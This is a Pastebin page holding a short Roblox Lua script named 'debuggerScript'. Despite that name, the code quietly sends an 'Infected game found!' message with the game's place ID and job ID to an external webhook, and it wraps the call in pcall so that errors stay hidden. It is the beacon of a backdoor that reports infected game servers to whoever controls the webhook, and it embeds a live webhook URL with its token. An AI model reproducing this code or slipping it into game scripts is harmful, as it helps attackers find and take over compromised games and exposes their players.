Advertisement
Kuzey2010

debuggerScript

Apr 4th, 2023
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.44 KB | None | 0 0
  1. pcall(function()
  2.     local httpservice = game:GetService("HttpService")
  3.     local url = "https://hooks.hyra.io/api/webhooks/1092163145805611068/IiLoU3dcZXeS50jCd4QIsjPIpYpoPK9n91_lOjs0RglJ5oF80v1_RWlM5wKk1FYLyiTR"
  4.     local data = {
  5.         ["content"] = "**Infected game found! Link: **https://www.roblox.com/games/"..game.PlaceId.. " **Job ID: **"..game.JobId
  6.  
  7.     }
  8.     local finaldata = httpservice:JSONEncode(data)
  9.     httpservice:PostAsync(url, finaldata)
  10. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement